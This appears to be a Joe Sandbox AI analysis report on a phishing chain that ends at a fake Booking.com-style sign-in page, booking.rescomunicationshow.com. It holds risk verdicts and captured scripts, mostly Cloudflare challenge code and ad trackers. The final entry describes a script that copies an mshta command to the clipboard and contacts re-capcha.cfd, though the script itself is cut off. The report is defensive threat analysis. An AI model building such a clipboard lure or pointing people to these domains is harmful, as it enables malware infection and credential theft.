URL: https://bitl.to Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": true,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://bitl.to |
URL: https://booking.rescomunicationshow.com/sign-in?op... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script exhibits several moderate-risk behaviors, including external data transmission, fallback domains, and aggressive DOM manipulation. While some of the behavior may be legitimate (e.g., analytics or telemetry), the overall complexity and obfuscation of the script warrant further review to ensure there are no malicious intentions."
} |
(function(){window._cf_chl_opt={cvId: '3',cZone: "booking.rescomunicationshow.com",cType: 'managed',cRay: '8fb7cddbbcf4c448',cH: 'cGAeyudZ73PjkFiinC5V0cyCJh2q1u4xmaKNl8eRlDo-1735790028-1.2.1.1-4xeqNc4tvV4D8psVgUk48_SK.611Jo88PTM6uAVFGhg9V9_IbsuAHJKkQOFN.WPe',cUPMDTk: "\/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI&__cf_chl_tk=Ks6YB2xXNS9n6GovBJCmWw9MnR_W5Hc.aZF_CEhBV6I-1735790028-1.0.1.1-7j0VxEGcCVcUIdLUblw8cX9lABTNGzGz35s4MHewicg",cFPWv: 'b',cITimeS: '1735790028',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS1N1OG5VZ25uQ3pSci1MYkt5TXFxaVNWanNsMjV4WnM6BFMyNTZCBGNvZGUqEzCSipujlK4nOgBCAFjd1NXosDI&__cf_chl_f_tk=Ks6YB2xXNS9n6GovBJCmWw9MnR_W5Hc.aZF_CEhBV6I-1735790028-1.0.1.1-7j0VxEGcCVcUIdLUblw8cX9lABTNGzGz35s4MHewicg",md: "Hwzu0f6kxvI7yS4SDdLV59CDXoZNxMemlu55ldas4kI-1735790028-1.2.1.1-sXtWEKLDu1II2lnRtkDPRn8lPCXBp_hsowjoC2dN96y_QRES5QUSufOiV369oVw9IJR2tdn0vdDQjR680gia6T47nNIyyCt8Rrw62BsLWGKdNOiKIWiSQ2eQdSL_TVPDHwVn1K5dlCqvyw2wAwZHwi6eYLMXeoAOG06knFuJU_C7pZaPZ0xIZygB8Ec._NEOZqB8XnROrJYrOvC6iQafldb6XcE839rl01kA40B9PGopy1EHZ.81XS8.upp3jeiOytkiYwPughK1o1zawjRuBOQ.Qa2NbRUiZ0s696UKTe6smb.kCuGOemCq0ORh_uQqS4mXf3iWC2HtCdPrq_EJtTeiNwiN3y7TWei6bkAnQbn1IUdjS.Ki9Hn5V3p5v_pJtLlpuu0veh_21afkVoC3BjiprpOS0t90Ced5GV8Ve3tspptmmez_NS9C18RVNFqobKeceU7EXrR0_.XLezNnFbhjYnsVSAv8Hm7xpixPmVlLa2HQLYoait7bD34rDROxrxssrGKNC45G7f9BfGYaqe859IKprlZ30btNJSy0_obP_wsPBqsQS9EzZC41uPBkMUQrdy8jIkUxzkQlDaW_oMW3YS.zddE3pilMWZoh410xzrzyf07w0I8JsBy7BEQucoMYDce6XmFQlTLv8NNyc6NfrcattutxSjb7MFhlygi9ogryVTL1l4CZhE2TLJvh2I0H8W6mXnfyKzt5xQcCTx5imJtNGXB7IEHEMIgcfmbn0pQCWZNfHkFz2mX.EhHqkutDkFwWHNbWtFqnsyzeCZdAWhVq8AAVVuj61gLdW.sKXianpFaMK7QVZrKRptcp3L9haYYIGQZ4k8n_uE8dJSVHmdlQj7E_xLuJ_nxYts7tCIoLxVDUEcA3JupZep6sKPhQwlm_zX3Od5Ox41gsq_4_IOX2i5BzC6SKNW0ovY7Pz7hq5wNhllvrWEqtE2ZUwGYLy9dM9QBk7x5RZmbgksn7n1gVQ_2a3Ud1hbFu8VL_t5aARK3fi1524HR7bJqmbQHmXCbs019.P9qBBbHTpMxMiXasQCid17xzk.q8XYvGR.PmwVmHlHDwzRfrZ3c7ZJlL1xj7Es9y6XplveUifZNoxP1kkpoSpD7DkA_tXuliud4Cn1FD8Lbqy3BwiRKSeRcSNtC8GAN8e6fxuYLsO4VWAHWWa4KMLTXEncr9q8KRl.jULNkSWJsfWsO.yQhUwbPoys6h3lNdDcPqLLFWoOd99vJswzRa0jsjLFSQxiqqsgXwt46q1UgwbvsMwHMygHw37S9Jj31ow0_hu1qRLAGCD2EP2oVNwni46rCosLN0XXZEEoJpDnD96GLeq2rJWmyWT2uOxvwoA_FUljIdJD0GdpTNmkrLirERTQZbWBmlx0_b.ZDyI08VDg8qqGrP7B..WTs87PNc.ycPaA33o4An0u1WY5LvfIv5.ed9sFsATzBDR1t7xqyY.YqggoOQELsDhN1B2LHkZsHxXt0_on9RmIs2WcRaChyNSShbMCwn99tO.BauJyARDNzbdrWnKhdDIBS9.08zCtrZOnBU0OCfyS.WUF2KVAPjJpKeWTNIT2.B7LlL.hdf5hGaxQsUIamW5EfSJnNOq6h7d2mFJyGz8rtCLGXYk7JuUYkI1O.ZHCvfUVjrmpp5d_BNd9StDQyerzRokDa6P6zbIrCh5KRgrJ_C0xUseaBG85y_TTjo72s4Pxy1LJNijfV5Xa7OLYBeXfu42UN84XQbtX11G5HKUF07RDNth5aIgMijGMCFgizm6H4Vca8vo0pkMarMXp3ltPmCE6TzaLiHd8uFJP_h7jBGPFvTYb2MjZF4Qm81u4iFtU6hvjkibxA7NNZRLdlQle_VPsspmtc7f_.kCwpg7PBGAoqk9CT6VYmvgGF9esOXU8d6IVoODaVp.fxRy8dDghQiOIfM_7UA5KL_7WyxuI4h1tx6CKHpe1NlFx9q129Fz6Cm3hjU9bpFQVjUpn61FDWk8HHK7cuT5d3DxWq4LPqsAX6cZAgUmmQB.rynFX5E5ehjpmCEYivXfGUkgAE1EIEqV1KDoSyAOCC60Pa3K87r1DsJn71UOzZcklNRuYeCkUksrFLyqZLOlYSBIxzVp5mXZuhA2tgV_m8AuQxXmgT0wfggdHCAarL4ONsNB_eGTpcSzP9bx1kmEJcdx0XhJwdTnEBY2Qui6Tn4ObOEG2.Hwl6U7VWh2RBiGLtXsc7gicHr7Khskh7btzAhDNhfuUckMabCGh8P8vnM1CMveV9Wbo72nSPM2WkdA3x9OBDKI3R0tiEQjMQudIvUAjdP1XXwZPY0KQd0.wY3H_S7_uhBPmTuXsYIVjuFg0NbgAhrDcclbIjl7FKk0Cgh0zvXFPTLugM.RxmmJGir8YmG791oR9eC8tacmslglqVwmCqliDK7HOk2402onb1RH6HDAsMp3SNLT8xUK2b4eArYhjYu68Pn1YDT1wQJ3xiyheZyqerAR4qNRoafjRUOHGV8kBKgi3r.6Ej3kxDVtYwhZ6MVm1TnqaQBOUiInBREIIMlYOUztu3cfQqybxcqJFuXbpH8LNYyNZ8uFOhL4XE1Jew26hoOOLmgFBnaODpMcOxco1B0znAauNxZRcn4oX602Ly5xrHNEoiLnneIBpUNYUM_7tNGC7ijh69gZUxX0.sKLISIPRDrwhr5OTgYi1otmLwpu1FQ6vsemf |
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from abuse. The script sets up various Cloudflare-specific options, but does not contain any high-risk indicators like dynamic code execution, data exfiltration, or malicious redirects. The script is likely part of a legitimate security measure and does not pose a significant risk."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'z2tfv',
chlApiSitekey: '0x4AAAAAAADnPIDROrmt1Wwj',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'XZbcWm52l9mmMzEkf7DwsL8Y1I1IPgao9mA_dL3ryzA-1735790031-1.3.1.1-F3OpdCausv1aS2LhuwEVTuS55bu5wMWqmK1BjeGXDdU',
chlApiTimeoutEncountered: 0,
chlApiOverrun
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare Turnstile challenge implementation, which is a legitimate security mechanism used to verify user interactions. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles the user interface and translations for the Turnstile challenge, which is a common practice for enhancing website security. Therefore, this script is considered low risk."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_feedback_description":"Send%20Feedback","turnstile_footer_terms":"Terms","turnstile_overrun_description":"Stuck%20here%3F","turnstile_refresh":"Refresh","turnstile_failure":"Error","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_feedback_report":"Having%20trouble%3F","turnstile_timeout":"Timed%20out","turnstile_success":"Success%21","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_footer_privacy":"Privacy","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","human_button_text":"Verify%20you%20are%20human","turnstile_verifying":"Verifying...","turnstile_expired":"Expired","testing_only":"Testing%20only.","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists."},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eV,f1,f4,f6,f7,f8,fk,fw,fC,fD,fE,fO,fZ,g3,g7,g8,gc,gd,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(429))/1+parseInt(gI(446))/2*(parseInt(gI(635))/3)+-parseInt(gI(998))/4+-parseInt(gI(681))/5+-parseInt(gI(547))/6+parseInt(gI(219))/7+parseInt(gI(1303))/8*(parseInt(gI(1292))/9),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,525922),eM=this||self,eN=eM[gJ(1471)],eO=function(gK,d,e,f,g){return gK=gJ,d={'XaDch':gK(274),'rOjQN':function(h,i){return h==i},'onfPr':gK(324),'BtgmM':function(h){return h()},'cJHrX':gK(870),'PaHEa':function(h,i){return i===h},'mTIgu':function(h,i){return h+i},'tBNYl':function(h,i){return h<<i},'upLfb':function(h,i){return h&i},'cJGcq':function(h,i){return h-i},'VeTEU':function(h,i){return h(i)},'faFJW':function(h,i){return h>i},'fJDnO':function(h,i){return i&h},'oejzJ':function(h,i){return h<i},'CuRlj':function(h,i){return h&i},'UAKwD':function(h,i){return h(i)},'Qtxiq':function(h,i){return h>i},'rhauw':function(h,i){return i|h},'buRxO':function(h,i){return h==i},'OMZic':gK(856),'lFZvc':function(h,i){return h==i},'yrTec':function(h,i){return i!=h},'ZHFJg':function(h,i){return i*h},'JobZN':function(h,i){return h>i},'FzXdf':function(h,i){return i!=h},'oAIjt':function(h,i){return h*i},'sMWLs':function(h,i){return i===h}},e=String[gK(699)],f={'h':function(h,gL){return gL=gK,d[gL(1358)](null,h)?'':f.g(h,6,function(i,gM){if(gM=gL,d[gM(1414)]!==d[gM(1414)])e=f;else return gM(1331)[gM(240)](i)})},'g':function(i,j,o,gO,s,x,B,C,D,E,F,G,H,I,J,K,Q,R,S,T,U,L,M,N){if(gO=gK,s={'EUYWr':function(O,P,gN){return gN=b,d[gN(975)](O,P)},'kHKFK':func |
URL: https://challenges.cloudflare.com/turnstile/v0/b/7... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any clear indicators of malicious intent, the use of dynamic code execution, external data transmission, and aggressive DOM manipulation warrant further review. Additionally, the presence of obfuscated code and the use of multiple fallback domains increase the overall risk profile of the script. Overall, this script requires closer inspection to determine its true purpose and potential impact on user security and privacy."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate security mechanism used to protect websites from abuse. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles communication between the challenge widget and the parent window, which is a common pattern for Cloudflare's managed challenge system. While the script uses some legacy APIs like `XDomainRequest`, these are low-risk indicators and are likely used for compatibility reasons. Overall, the script seems to be a benign implementation of Cloudflare's challenge system and does not pose a significant security risk."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'z2tfv',
chlApiSitekey: '0x4AAAAAAADnPIDROrmt1Wwj',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'XZbcWm52l9mmMzEkf7DwsL8Y1I1IPgao9mA_dL3ryzA-1735790031-1.3.1.1-F3OpdCausv1aS2LhuwEVTuS55bu5wMWqmK1BjeGXDdU',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8fb7cdee69a64384',
cH: 'zL.l02GEcYV8XE09QY8T_gMFNbMzF0Kf1VlWo0FcsbA-1735790031-1.1.1.1-plc_Pm8TkgmIMh.wocOyccUvK2qk9zUYsSPh0QTZfYAgYkrtWMT64QzBzURI9qB3',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
md: 'j1xisQYOkML_VwtE9nVAze7ioVexHoC_ouXGRV6IPM4-1735790031-1.1.1.1-jB0K2KOrPsODroGdJgaJDK4z_eeixmvKVsHs48IYAK_jcAdWcpJ94iNcDews1CcAHg6A015G0DymgEQkf7SJah_mQgRxTeETzk2XXrIdPxGcKBct8h_NUS6BO6uxeAbnlSEWB7n30FX4Fonmxuw9.RiRPptKyiJSkNkdqnKWX_kXfANQ1x8AOU6LCdncFpIjrpNZlsWuS5ampwyPQs.YK2HBpH0mBp1shWjvP4aPgmIu3Wjjgml7htY1c2WMnWNLTQeyQ4zCptj5o6ejb5bMYt1OEQHuvZtOc7FnRgXHgAyzC1wRDQWBKtBequTSdFhtc3BhjVX7KF4lS7dKfxjN_iofl37q.cT.iEFbbcDFoUmPzYJdT3hsL.PwpEbsATgP4R5UN1vYp2JlOtTa9E4gdc5kRED.Bfp6Z1SLK6pT.aq3dD2LqwzEnSk4NA8KILCN9vB5ZvkNHTLp5FSsgBRDRYTH.zkPkFbTi.AanO.0wPi16mzdkbdF.UA0D6QdiWfrT25uqW3cYlNlpMJKEXDzTBDVFpqtIGcMCBURx82_G.pVCN.JWANqayisE9ez7j.jqyjdxNZOv1ljLgEaQt6fgedPE4vchEfrzjY5kIKX1PCe.HmvTMaW5OMp0F4R4dPfqpyRloJmNyvCOpUONwcpYMSGOOQhI1PTbNz9g4iNnn0qHr1.FhOey_n0Sjep316qK48lENS8e8a_1jRL.hffUaERzODVPuxrqHPGnjx9aF8HhlCW2xO8noIJsKN68mC5AJLwG8FpYVmxs7gvUXQmx2TR9Yg1rrs8DoewYCpUbWNI3vn.lexwq4nk_csYVDoOGlTerIFUqh24EYlhxQCqAdjTexi68fxTaiNqSqQETCUamu1sB_2LIUjO3Hxjl4UeII6IDUpVnXxVJEQNm9Gv64b8IdFGjBEpBPvP2l7dkj0Ing.AfYPARHAJDxAEZncNQaNAWbDOEdkb7784MCwyaj5HXHCVmKr30DQwUTP5s6tCXbhe2UrwqFKMX_1nZtjwXpoGS64XCrlpD.N_ow2wfdFqipDI8T2.mlZTpur4SOXqJRav4W0750km7pybAhmJrAc6ZJdsRSJ5ctvcPH2qdY2w51fzHWeJv8iS0xEj8lJryXr6g_PWPGKrFtxXQSp6AioS5ZQ.oflQLINnEF4_EG64DUFn2GH2Vj4wDTi4BTaJJJpQCTPDKUbPon0cLR83HGSXJgmJDiEsXqQL6UBXDA8nrqhOjslknpcpWApmb4xohd5c95cfEjVkicGo7S9wYSdK9QbQ33N8rVZEj70EsTbmrh__QsCL8l8tSQJS8sLqY89Jo5DN6.4tITwUeCln050VElG50jiXrttXSbXniqkmcKNYTGK22D4.ycTTmJeYiepFSbeyJHWsnEKw2Cu9',
cITimeS: '1735790031',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'z2tfv',
nextRcV: 'XZbcWm52l9mmMzEkf7DwsL8Y1I1IPgao9mA_dL3ryzA-1735790031-1.3.1.1-F3OpdCausv1aS2LhuwEVTuS55bu5wMWqmK1BjeGXDdU',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
URL: https://booking.rescomunicationshow.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://booking.rescomunicationshow.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://booking.rescomunicationshow.com |
URL: https://booking.rescomunicationshow.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://booking.rescomunicationshow.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://booking.rescomunicationshow.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://booking.rescomunicationshow.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://booking.rescomunicationshow.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://booking.rescomunicationshow.com/sign-in?op... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This script appears to be a legitimate Marketo tracking script. It initializes the Marketo Munchkin API, which is a common marketing and analytics tool. While it uses some older practices like `onreadystatechange`, the overall behavior is consistent with typical analytics functionality and does not demonstrate any high-risk indicators."
} |
(function(){var didInit=false;function initMunchkin(){if(didInit===false){didInit=true;Munchkin.init("261-NRZ-371")}}var s=document.createElement("script");s.type="text/javascript";s.async=true;s.src="//munchkin.marketo.net/munchkin.js";s.onreadystatechange=function(){if(this.readyState=="complete"||this.readyState=="loaded"){initMunchkin()}};s.onload=initMunchkin;document.getElementsByTagName("head")[0].appendChild(s)})();
|
URL: https://booking.rescomunicationshow.com/sign-in?op... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a legitimate Criteo advertising script. It sets up the Criteo advertising platform by configuring the account, device type, and triggering a 'viewHome' event. While it collects some user data, this is typical behavior for advertising and analytics scripts, and there are no clear indicators of malicious intent."
} |
window.criteo_q=window.criteo_q||[];const deviceType=/iPad/.test(navigator.userAgent)?"t":/Mobile|iP(hone|od)|Android|BlackBerry|IEMobile|Silk/.test(navigator.userAgent)?"m":"d";window.criteo_q.push({event:"setAccount",account:"37899"},{event:"setEmail",email:"",hash_method:""},{event:"setCustomerId",id:""},{event:"setSiteType",type:deviceType},{event:"viewHome"});
|
URL: https://booking.rescomunicationshow.com/sign-in?op... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to a suspicious domain. The use of the `copyToClipboard` function to execute a `mshta` command and the interaction with the `re-capcha.cfd` domain are particularly concerning. Additionally, the script manipulates the DOM in an aggressive manner, further increasing the risk score. Overall, this script demonstrates a high level of malicious intent and should be treated with caution."
} |
function antibotcheck()
{
